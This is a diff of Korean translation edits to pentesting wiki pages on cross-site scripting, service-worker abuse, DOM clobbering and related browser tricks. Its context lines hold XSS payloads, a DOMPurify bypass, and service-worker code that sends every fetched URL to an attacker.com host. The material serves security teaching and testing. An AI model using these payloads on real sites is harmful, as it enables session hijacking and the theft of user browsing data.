 이 기술의 훌륭한 악용 사례는 [**이 블로그 게시물**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html)에서 찾을 수 있습니다.
 
-### 관리자로 세션 전송
+### 세션을 관리자에게 전송하기
 
-사용자가 자신의 프로필을 관리자와 공유할 수 있으며, 만약 self XSS가 사용자의 프로필 안에 있다면 관리자가 이를 접근할 때 취약점을 유발할 수 있습니다.
+사용자가 자신의 프로필을 관리자와 공유할 수 있으며, 만약 self XSS가 사용자의 프로필 안에 있다면 관리자가 이를 접근할 경우 취약점을 유발할 수 있습니다.
 
 ### 세션 미러링
 
-self XSS를 발견하고 웹 페이지에 **관리자를 위한 세션 미러링**이 있다면, 예를 들어 고객이 도움을 요청할 수 있도록 하여 관리자가 당신을 도와주기 위해 당신의 세션에서 보고 있는 것을 자신의 세션에서 보게 됩니다.
+self XSS를 발견하고 웹 페이지에 **관리자를 위한 세션 미러링**이 있다면, 예를 들어 클라이언트가 도움을 요청할 수 있도록 하여 관리자가 당신을 도와주기 위해 당신의 세션에서 보고 있는 것을 자신의 세션에서 보게 됩니다.
 
 당신은 **관리자가 당신의 self XSS를 유발하게 하고 그의 쿠키/세션을 탈취할 수 있습니다.**
 
@@ -776,7 +782,7 @@ self XSS를 발견하고 웹 페이지에 **관리자를 위한 세션 미러링
 ```
 ### Ruby-On-Rails 우회
 
-**RoR 대량 할당**으로 인해 HTML에 인용문이 삽입되고 인용문 제한이 우회되며 추가 필드(onfocus)가 태그 내에 추가될 수 있습니다.\
+**RoR 대량 할당**으로 인해 HTML에 인용이 삽입되고 인용 제한이 우회되며 추가 필드(onfocus)가 태그 내에 추가될 수 있습니다.\
 양식 예제 ([이 보고서에서](https://hackerone.com/reports/709336)), 페이로드를 전송하면:
 ```
 contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
@@ -819,22 +825,22 @@ document['default'+'View'][`\u0061lert`](3)
 ```
 ### XSS with header injection in a 302 response
 
-302 리다이렉트 응답에서 **헤더를 주입할 수 있다면**, **브라우저가 임의의 JavaScript를 실행하도록 시도할 수 있습니다**. 이는 **간단하지 않습니다**. 현대 브라우저는 HTTP 응답 상태 코드가 302인 경우 HTTP 응답 본문을 해석하지 않기 때문에, 단순한 크로스 사이트 스크립팅 페이로드는 무용합니다.
+302 Redirect 응답에서 **헤더를 주입할 수 있다면**, **브라우저가 임의의 JavaScript를 실행하도록 시도할 수 있습니다**. 이는 **간단하지 않습니다**. 현대 브라우저는 HTTP 응답 상태 코드가 302인 경우 HTTP 응답 본문을 해석하지 않기 때문에, 단순한 크로스 사이트 스크립팅 페이로드는 무용합니다.
 
 [**이 보고서**](https://www.gremwell.com/firefox-xss-302)와 [**이 보고서**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)에서 Location 헤더 내에서 여러 프로토콜을 테스트하고, 그 중 어떤 것이 브라우저가 본문 내의 XSS 페이로드를 검사하고 실행할 수 있도록 허용하는지 확인하는 방법을 읽을 수 있습니다.\
 과거에 알려진 프로토콜: `mailto://`, `//x:1/`, `ws://`, `wss://`, _빈 Location 헤더_, `resource://`.
 
 ### Only Letters, Numbers and Dots
 
-JavaScript가 **실행할** **콜백**을 해당 문자로 제한할 수 있다면, [**이 게시물의 이 섹션**](./#javascript-function)을 읽어 이 동작을 악용하는 방법을 찾으세요.
+JavaScript가 **실행할** **콜백**을 이러한 문자로 제한할 수 있다면. [**이 게시물의 이 섹션을 읽어보세요**](./#javascript-function) 이 동작을 악용하는 방법을 찾기 위해.
 
 ### Valid `<script>` Content-Types to XSS
 
 (From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) `application/octet-stream`과 같은 **content-type**으로 스크립트를 로드하려고 하면, Chrome은 다음과 같은 오류를 발생시킵니다:
 
-> Refused to execute script from ‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
+> MIME 유형(‘application/octet-stream’)이 실행 가능하지 않으며, 엄격한 MIME 유형 검사가 활성화되어 있기 때문에 ‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx')에서 스크립트를 실행하는 것을 거부했습니다.
 
-Chrome이 **로드된 스크립트**를 실행하는 것을 지원하는 유일한 **Content-Type**은 [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)에서 const **`kSupportedJavascriptTypes`**에 있는 것들입니다.
+Chrome이 **로드된 스크립트**를 실행할 수 있도록 지원하는 유일한 **Content-Type**은 [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)에서 const **`kSupportedJavascriptTypes`** 내에 있는 것들입니다.
 ```c
 const char* const kSupportedJavascriptTypes[] = {
 "application/ecmascript",
@@ -856,9 +862,9 @@ const char* const kSupportedJavascriptTypes[] = {
 };
 
 ```
-### XSS에 대한 스크립트 유형
+### Script Types to XSS
 
-(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) 그래서, 어떤 유형이 스크립트를 로드하는 데 사용될 수 있습니까?
+(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) 그래서 어떤 유형이 스크립트를 로드하는 데 사용될 수 있습니까?
 ```html
 <script type="???"></script>
 ```
@@ -945,7 +951,7 @@ import { partition } from "lodash"
 chrome-cache-to-xss.md
 {{#endref}}
 
-### XS Jail 탈출
+### XS 감옥 탈출
 
 사용할 수 있는 문자 집합이 제한된 경우, XSJail 문제에 대한 다른 유효한 솔루션을 확인하십시오:
 ```javascript
@@ -1224,7 +1230,7 @@ oﾟｰﾟo = (ﾟωﾟﾉ + "_")[c ^ _ ^ o]
 ```
 ## XSS 일반 페이로드
 
-### 여러 페이로드를 하나로
+### 여러 페이로드를 1개로
 
 {{#ref}}
 steal-info-js.md
@@ -1232,7 +1238,7 @@ steal-info-js.md
 
 ### Iframe 트랩
 
-사용자가 iframe을 종료하지 않고 페이지를 탐색하게 하여 그의 행동을 훔치고 (양식에 전송된 정보를 포함하여):
+사용자가 iframe을 종료하지 않고 페이지를 탐색하게 하여 그의 행동을 훔치고 (양식에 전송된 정보 포함):
 
 {{#ref}}
 ../iframe-traps.md
@@ -1354,7 +1360,7 @@ console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms")
 ```
 _짧은 시간은 응답하는 포트를 나타냅니다._ _긴 시간은 응답이 없음을 나타냅니다._
 
-Chrome에서 금지된 포트 목록을 검토하세요 [**여기**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) 및 Firefox에서 [**여기**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
+Chrome에서 차단된 포트 목록을 검토하세요 [**여기**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) 및 Firefox에서 [**여기**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
 
 ### 자격 증명을 요청하는 상자
 ```markup
@@ -1490,7 +1496,7 @@ document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
 
 ### Markdown에서의 XSS
 
-렌더링될 Markdown 코드를 주입할 수 있나요? 아마도 XSS를 얻을 수 있을 것입니다! 확인해 보세요:
+렌더링될 Markdown 코드를 주입할 수 있나요? 아마도 XSS를 얻을 수 있을 것입니다! 확인해보세요:
 
 {{#ref}}
 xss-in-markdown.md
@@ -1498,7 +1504,7 @@ xss-in-markdown.md
 
 ### SSRF로의 XSS
 
-**캐싱을 사용하는 사이트에서 XSS를 얻었나요?** 이 페이로드를 사용하여 **그것을 SSRF로 업그레이드**해 보세요:
+**캐싱을 사용하는 사이트**에서 XSS를 얻었나요? 이 페이로드를 통해 **SSRF로 업그레이드**해보세요:
 ```python
 <esi:include src="http://yoursite.com/capture" />
 ```
@@ -1508,7 +1514,7 @@ xss-in-markdown.md
 ### 동적으로 생성된 PDF에서의 XSS
 
 웹 페이지가 사용자 제어 입력을 사용하여 PDF를 생성하는 경우, PDF를 생성하는 **봇을 속여서** **임의의 JS 코드를 실행**하도록 시도할 수 있습니다.\
-따라서 **PDF 생성 봇이** 어떤 종류의 **HTML** **태그**를 찾으면, 이를 **해석**하게 되고, 이 동작을 **악용**하여 **서버 XSS**를 유발할 수 있습니다.
+따라서 **PDF 생성기 봇이** 어떤 종류의 **HTML** **태그**를 찾으면, 이를 **해석**하게 되고, 이 동작을 **악용**하여 **서버 XSS**를 유발할 수 있습니다.
 
 {{#ref}}
 server-side-xss-dynamic-pdf.md
@@ -1524,7 +1530,7 @@ pdf-injection.md
 
 AMP는 모바일 장치에서 웹 페이지 성능을 가속화하기 위해 HTML 태그와 JavaScript를 보완하여 기능성을 보장하며 속도와 보안에 중점을 둡니다. 다양한 기능을 위한 여러 구성 요소를 지원하며, [AMP 구성 요소](https://amp.dev/documentation/components/?format=websites)를 통해 접근할 수 있습니다.
 
-[**이메일용 AMP**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) 형식은 특정 AMP 구성 요소를 이메일로 확장하여 수신자가 이메일 내에서 콘텐츠와 직접 상호작용할 수 있도록 합니다.
+[**이메일용 AMP**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) 형식은 특정 AMP 구성 요소를 이메일로 확장하여 수신자가 이메일 내에서 직접 콘텐츠와 상호작용할 수 있도록 합니다.
 
 예시 [**Gmail의 Amp4Email에서 XSS 작성**](https://adico.me/post/xss-in-gmail-s-amp4email).
 
@@ -1586,7 +1592,7 @@ id="foo"/>
 ```xml
 <svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
 ```
-**더 많은 SVG 페이로드를** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)에서 찾으세요.
+**더 많은 SVG 페이로드를 찾으세요** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
 
 ## 기타 JS 트릭 및 관련 정보
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
index 12a35c56d..596ec1072 100644
--- a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
+++ b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
@@ -19,16 +19,16 @@
 이 취약점을 악용하기 위해서는 다음을 찾아야 합니다:
 
 - 서버에 **임의의 JS** 파일을 **업로드**할 수 있는 방법과 업로드된 JS 파일의 **서비스 워커를 로드하는 XSS**
-- **출력을 조작할 수 있는 취약한 JSONP 요청**(임의의 JS 코드로)과 **페이로드로 JSONP를 로드하는 XSS**가 필요합니다. 이 페이로드는 **악성 서비스 워커를 로드**합니다.
+- **출력을 조작할 수 있는 (임의의 JS 코드로)** **취약한 JSONP 요청**과 **페이로드로 JSONP를 로드하는 XSS**가 필요합니다. 이 페이로드는 **악성 서비스 워커를 로드**합니다.
 
-다음 예제에서는 `fetch` 이벤트를 수신하고 **각 가져온 URL을 공격자의 서버로 전송하는 새로운 서비스 워커를 등록하는 코드**를 제시하겠습니다(이 코드는 **서버**에 **업로드**하거나 **취약한 JSONP** 응답을 통해 로드해야 합니다):
+다음 예제에서는 `fetch` 이벤트를 수신하고 **각 가져온 URL을 공격자의 서버로 전송하는** 새로운 서비스 워커를 **등록하는 코드**를 제시하겠습니다 (이 코드는 **서버**에 **업로드**하거나 **취약한 JSONP** 응답을 통해 로드해야 하는 코드입니다):
 ```javascript
 self.addEventListener('fetch', function(e) {
 e.respondWith(caches.match(e.request).then(function(response) {
 fetch('https://attacker.com/fetch_url/' + e.request.url)
 });
 ```
-이것은 **워커를 등록하는** 코드입니다 (당신이 **XSS**를 악용하여 실행할 수 있어야 하는 코드). 이 경우 **GET** 요청이 **공격자** 서버로 전송되어 서비스 워커의 **등록**이 성공했는지 여부를 **알립니다**:
+이것은 **워커를 등록하는** 코드입니다 (당신이 **XSS**를 악용하여 실행할 수 있어야 하는 코드). 이 경우 **GET** 요청이 **공격자**의 서버로 전송되어 서비스 워커의 **등록**이 성공했는지 여부를 **알립니다**:
 ```javascript
 <script>
 window.addEventListener('load', function() {
@@ -51,7 +51,7 @@ xhttp2.send();
 var sw =
 "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//"
 ```
-C2는 **Service Workers의 악용**에 전념하는 [**Shadow Workers**](https://shadow-workers.github.io)라는 것이 있으며, 이 취약점을 악용하는 데 매우 유용할 것입니다.
+전용 **C2**가 있으며, **Service Workers**의 **악용**을 위해 [**Shadow Workers**](https://shadow-workers.github.io)라는 이름으로 불립니다. 이는 이러한 취약점을 악용하는 데 매우 유용할 것입니다.
 
 **24시간 캐시 지시어**는 악의적이거나 손상된 **service worker (SW)**의 수명을 XSS 취약점 수정 후 최대 24시간으로 제한합니다. 온라인 클라이언트 상태를 가정합니다. 취약성을 최소화하기 위해 사이트 운영자는 SW 스크립트의 Time-To-Live (TTL)를 낮출 수 있습니다. 개발자들은 또한 신속한 비활성화를 위한 [**service worker kill-switch**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776)를 만들도록 권장됩니다.
 
@@ -61,7 +61,7 @@ Service Worker에서 호출된 **`importScripts`** 함수는 **다른 도메인
 
 **이것은 CSP 보호를 우회합니다.**
 
-**취약한 코드 예시:**
+**예제 취약한 코드:**
 
 - **index.html**
 ```html
@@ -88,7 +88,7 @@ DOM 클로버링이 무엇인지에 대한 자세한 정보는 다음을 확인
 dom-clobbering.md
 {{#endref}}
 
-SW가 **`importScripts`**를 호출하는 URL/도메인이 **HTML 요소 내부에** 있을 경우, **DOM 클로버링을 통해 이를 수정하여** SW가 **자신의 도메인에서 스크립트를 로드하도록** 할 수 있습니다.
+SW가 **`importScripts`**를 호출하는 URL/도메인이 **HTML 요소 내부에** 있을 경우, **DOM 클로버링을 통해 이를 수정하여 SW가 당신의 도메인에서 스크립트를 로드하도록** 할 수 있습니다.
 
 이와 관련된 예시는 참조 링크를 확인하세요.
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
index ee5823a76..2dd5b30e8 100644
--- a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-더 깊이 있는 세부사항은 [**이 글**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote)에서 확인할 수 있습니다.
+자세한 내용은 [**이 글**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote)에서 확인할 수 있습니다.
 
 여기서 논의된 기술은 두 가지 주요 캐시 유형인 **back/forward cache (bfcache)**와 **disk cache**의 동작 및 상호작용을 이해하는 것과 관련이 있습니다. bfcache는 JavaScript 힙을 포함한 페이지의 전체 스냅샷을 저장하며, 더 포괄적인 스냅샷을 저장할 수 있는 능력 덕분에 back/forward 탐색 시 disk cache보다 우선시됩니다. 반면, disk cache는 JavaScript 힙을 포함하지 않고 웹에서 가져온 리소스를 저장하며, 통신 비용을 줄이기 위해 back/forward 탐색에 사용됩니다. disk cache의 흥미로운 점은 `fetch`를 사용하여 가져온 리소스를 포함한다는 것으로, 이는 접근된 URL 리소스가 캐시에서 브라우저에 의해 렌더링된다는 것을 의미합니다.
 
@@ -13,12 +13,12 @@
 
 ### bfcache 비활성화:
 
-기본적으로 Puppeteer는 Chromium 문서에 나열된 조건에 맞춰 bfcache를 비활성화합니다. bfcache를 비활성화하는 효과적인 방법 중 하나는 `window.open()`을 사용하여 `window.opener`에 대한 참조를 유지하는 페이지를 여는 것입니다.
+기본적으로 Puppeteer는 Chromium 문서에 나열된 조건에 맞춰 bfcache를 비활성화합니다. bfcache를 비활성화하는 효과적인 방법 중 하나는 `window.opener`에 대한 참조를 유지하는 `window.open()`을 사용하여 페이지를 여는 것입니다.
 
 ### 동작 재현:
 
-1. 웹페이지를 방문합니다, 예: `https://example.com`.
-2. `open("http://spanote.seccon.games:3000/api/token")`을 실행하여 500 상태 코드로 서버 응답을 받습니다.
+1. 웹페이지를 방문합니다. 예: `https://example.com`.
+2. `open("http://spanote.seccon.games:3000/api/token")`을 실행합니다. 이로 인해 서버 응답이 500 상태 코드로 반환됩니다.
 3. 새로 열린 탭에서 `http://spanote.seccon.games:3000/`으로 이동합니다. 이 작업은 `http://spanote.seccon.games:3000/api/token`의 응답을 disk cache로 캐시합니다.
 4. `history.back()`을 사용하여 뒤로 탐색합니다. 이 작업은 페이지에 캐시된 JSON 응답을 렌더링합니다.
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
index 894e06f88..e28fed35b 100644
--- a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
+++ b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
@@ -4,7 +4,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-클라이언트 사이드 JS를 디버깅하는 것은 URL을 변경할 때마다 (사용된 파라미터나 파라미터 값의 변경 포함) **중단점을 재설정하고 페이지를 새로 고쳐야** 하기 때문에 번거로울 수 있습니다.
+클라이언트 사이드 JS를 디버깅하는 것은 번거로울 수 있습니다. URL을 변경할 때마다(사용된 파라미터나 파라미터 값의 변경 포함) **중단점을 재설정하고 페이지를 새로 고쳐야** 합니다.
 
 ### `debugger;`
 
@@ -21,11 +21,11 @@ JS 파일 안에 `debugger;` 라인을 넣으면, **브라우저**가 JS를 실
 
 ![](<../../images/image (742).png>)
 
-이렇게 하면 **JS 파일이 로컬로 복사**되고 **브라우저에서 그 복사본을 수정할 수 있습니다**. 따라서 원하는 곳에 **`debugger;`** 명령을 추가하고, **변경 사항을 저장**한 후 **페이지를 새로 고치면**, 매번 그 웹 페이지에 접근할 때 **로컬 JS 복사본이 로드**되고 디버거 명령이 그 위치에 유지됩니다:
+이렇게 하면 **JS 파일이 로컬로 복사**되고 **브라우저에서 그 복사본을 수정할 수 있습니다**. 원하는 곳에 **`debugger;`** 명령을 추가하고, **변경 사항을 저장**한 후 **페이지를 새로 고치면**, 매번 그 웹 페이지에 접근할 때 **로컬 JS 복사본이 로드**되고 디버거 명령이 그 위치에 유지됩니다:
 
 ![](<../../images/image (594).png>)
 
-## 참고 문헌
+## 참고문헌
 
 - [https://www.youtube.com/watch?v=BW\_-RCo9lo8\&t=1529s](https://www.youtube.com/watch?v=BW_-RCo9lo8&t=1529s)
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
index b5665d41a..e10272096 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
@@ -13,7 +13,7 @@ console.log(typeof document.x) //[object HTMLFormElement]
 ```
 **오직** 특정 요소만이 **name 속성**을 사용하여 전역 변수를 클로버링할 수 있습니다. 이들은: `embed`, `form`, `iframe`, `image`, `img` 및 `object`입니다.
 
-흥미롭게도, **form 요소**를 사용하여 변수를 **클로버링**할 때, 요소 자체의 **`toString`** 값이 반환됩니다: `[object HTMLFormElement]` 그러나 **anchor**를 사용할 경우 **`toString`** 값은 앵커의 **`href`**가 됩니다. 따라서, **`a`** 태그를 사용하여 클로버링하면, 문자열로 처리될 때 **값**을 **제어**할 수 있습니다:
+흥미롭게도, **form 요소**를 사용하여 변수를 **클로버링**할 때, 요소 자체의 **`toString`** 값은 다음과 같습니다: `[object HTMLFormElement]` 그러나 **anchor**를 사용할 경우 **`toString`** 값은 앵커의 **`href`**가 됩니다. 따라서, **`a`** 태그를 사용하여 클로버링하면, 문자열로 처리될 때 **값**을 **제어**할 수 있습니다:
 ```html
 <a href="controlled string" id="x"></a>
 <script>
@@ -22,7 +22,7 @@ console.log(x) //controlled string
 ```
 ### Arrays & Attributes
 
-배열과 객체 속성을 **덮어쓰는** 것도 가능합니다:
+배열과 객체 속성을 **덮어쓸** 수도 있습니다:
 ```html
 <a id="x">
 <a id="x" name="y" href="controlled">
@@ -41,7 +41,7 @@ console.log(x.y) //controlled
 alert(x.y.z.value) //controlled
 </script>
 ```
-더 많은 속성을 클로버링하는 것은 **더 복잡하지만 여전히 가능합니다**, iframe을 사용하여:
+속성을 더 많이 클로버링하는 것은 **더 복잡하지만 여전히 가능합니다**, iframe을 사용하여:
 ```html
 <iframe name="x" srcdoc="<a id=y href=controlled></a>"></iframe>
 <style>
@@ -52,7 +52,7 @@ alert(x.y) //controlled
 </script>
 ```
 > [!WARNING]
-> style 태그는 **iframe이 렌더링할 충분한 시간을 주기 위해** 사용됩니다. 이것이 없으면 **undefined** 경고가 나타납니다.
+> style 태그는 **iframe이 렌더링할 충분한 시간을 주기 위해** 사용됩니다. 이것이 없으면 **undefined** 경고가 표시됩니다.
 
 더 깊은 속성을 클로버링하려면, **html 인코딩이 있는 iframe**을 다음과 같이 사용할 수 있습니다:
 ```html
@@ -68,7 +68,7 @@ alert(a.b.c.d.e) //controlled
 ```
 ### **필터 우회**
 
-필터가 `document.getElementByID('x').attributes`와 같은 것을 사용하여 노드의 **속성**을 **루프**하고 있다면, **.attributes** 속성을 **클로버**하여 필터를 **깨뜨릴** 수 있습니다. **`tagName`**, **`nodeName`** 또는 **`parentNode`**와 같은 다른 DOM 속성들도 **클로버**할 수 있습니다.
+필터가 `document.getElementByID('x').attributes`와 같은 것을 사용하여 노드의 **속성**을 **루프**하고 있다면, **`.attributes`** 속성을 **클로버**하여 필터를 **중단**시킬 수 있습니다. **`tagName`**, **`nodeName`** 또는 **`parentNode`**와 같은 다른 DOM 속성들도 **클로버**할 수 있습니다.
 ```html
 <form id="x"></form>
 <form id="y">
@@ -102,7 +102,7 @@ document.body.appendChild(script)
 ```
 이 방법은 스크립트 소스를 이용하여 원치 않는 코드를 실행합니다.
 
-**트릭**: **`DOMPurify`**는 **`cid:`** 프로토콜을 사용하도록 허용하며, 이는 **이중 따옴표를 URL 인코딩하지 않습니다**. 이는 **런타임에 디코딩될 인코딩된 이중 따옴표를 주입할 수 있음을 의미합니다**. 따라서 **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`**와 같은 것을 주입하면 HTML 인코딩된 `&quot;`가 **런타임에 디코딩되어** 속성 값에서 **탈출**하여 **`onerror`** 이벤트를 **생성**합니다.
+**트릭**: **`DOMPurify`**는 **`cid:`** 프로토콜을 사용하도록 허용하며, 이는 **이중 따옴표를 URL 인코딩하지 않습니다**. 이는 **런타임에 디코딩될 인코딩된 이중 따옴표를 주입할 수 있음을 의미합니다**. 따라서 **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`**와 같은 것을 주입하면 HTML 인코딩된 `&quot;`가 **런타임에 디코딩**되어 **속성 값에서 탈출**하여 **`onerror`** 이벤트를 **생성**합니다.
 
 또 다른 기술은 **`form`** 요소를 사용합니다. 특정 클라이언트 측 라이브러리는 새로 생성된 폼 요소의 속성을 검사하여 이를 정리합니다. 그러나 폼 안에 `id=attributes`가 있는 `input`을 추가함으로써 속성 속성을 효과적으로 덮어쓰게 되어, 세정기가 실제 속성에 접근하지 못하게 합니다.
 
@@ -112,9 +112,9 @@ document.body.appendChild(script)
 
 문서에 따르면 DOM 클로버링을 사용하여 문서 객체의 속성을 덮어쓸 수 있습니다:
 
-> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) 인터페이스는 [이름이 있는 속성](https://webidl.spec.whatwg.org/#dfn-support-named-properties)을 지원합니다. [Document](https://html.spec.whatwg.org/multipage/dom.html#document) 객체의 [지원되는 속성 이름](https://webidl.spec.whatwg.org/#dfn-supported-property-names)은 다음과 같으며, [트리 순서](https://dom.spec.whatwg.org/#concept-tree-order)에 따라 기여한 요소를 기준으로 하며, 나중의 중복을 무시하고, 동일한 요소가 두 가지를 기여할 때 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 속성의 값이 이름 속성의 값보다 먼저 옵니다:
+> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) 인터페이스는 [이름이 있는 속성](https://webidl.spec.whatwg.org/#dfn-support-named-properties)을 지원합니다. [Document](https://html.spec.whatwg.org/multipage/dom.html#document) 객체의 [지원되는 속성 이름](https://webidl.spec.whatwg.org/#dfn-supported-property-names)은 다음과 같으며, [트리 순서](https://dom.spec.whatwg.org/#concept-tree-order)에 따라 기여한 요소에 따라 정렬되며, 나중의 중복은 무시하고, 동일한 요소가 두 가지를 기여할 때는 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 속성의 값이 이름 속성의 값보다 먼저 옵니다:
 >
-> \- 비어 있지 않은 이름 콘텐츠 속성을 가진 모든 [노출된](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) 및 [노출된](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) 요소의 이름 콘텐츠 속성 값은 문서가 [루트](https://dom.spec.whatwg.org/#concept-tree-root)인 [문서 트리](https://dom.spec.whatwg.org/#in-a-document-tree)에 있어야 합니다;\
+> \- 비어 있지 않은 이름 콘텐츠 속성을 가진 모든 [노출된](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), 및 [노출된](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) 요소의 이름 콘텐츠 속성 값은 문서가 [루트](https://dom.spec.whatwg.org/#concept-tree-root)인 [문서 트리](https://dom.spec.whatwg.org/#in-a-document-tree)에 있어야 합니다;\
 > \
 > \- 비어 있지 않은 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 콘텐츠 속성을 가진 모든 [노출된](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) 요소의 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 콘텐츠 속성 값은 문서가 [루트](https://dom.spec.whatwg.org/#concept-tree-root)인 [문서 트리](https://dom.spec.whatwg.org/#in-a-document-tree)에 있어야 합니다;\
 > \
@@ -210,7 +210,7 @@ Click to send!
 ```
 - 더 많은 폼 속성은 [**버튼 확인하기**](https://www.w3schools.com/tags/tag_button.asp)**.**
 
-## References
+## 참고문헌
 
 - [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
 - [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
index 9611144cd..d33da8ac9 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -4,14 +4,14 @@
 
 ## DOM Invader
 
-DOM Invader는 Burp의 내장 브라우저에 설치된 도구입니다. 이 도구는 웹 메시지 및 프로토타입 오염을 포함한 다양한 소스와 싱크를 사용하여 **DOM XSS 취약점**을 **탐지하는 데** 도움을 줍니다. 이 도구는 확장 프로그램으로 사전 설치되어 있습니다.
+DOM Invader는 Burp의 내장 브라우저에 설치된 브라우저 도구입니다. 이 도구는 웹 메시지 및 프로토타입 오염을 포함한 다양한 소스와 싱크를 사용하여 **DOM XSS 취약점 탐지**를 지원합니다. 이 도구는 확장 프로그램으로 사전 설치되어 있습니다.
 
 DOM Invader는 브라우저의 DevTools 패널 내에 탭을 통합하여 다음을 가능하게 합니다:
 
-1. **DOM XSS 테스트를 위한 웹페이지에서 제어 가능한 싱크 식별**, 컨텍스트 및 정화 세부정보 제공.
+1. **DOM XSS 테스트를 위한 웹페이지의 제어 가능한 싱크 식별**, 컨텍스트 및 정화 세부정보 제공.
 2. **`postMessage()` 메서드를 통해 전송된 웹 메시지의 로깅, 편집 및 재전송**. DOM Invader는 특별히 제작된 웹 메시지를 사용하여 취약점을 자동으로 탐지할 수도 있습니다.
 3. **클라이언트 측 프로토타입 오염** 소스 탐지 및 위험한 싱크로 전송된 제어 가능한 가젯 스캔.
-4. **DOM 클로버링 취약점** 식별.
+4. **DOM 클로버링 취약점 식별**.
 
 ### 활성화하기
 
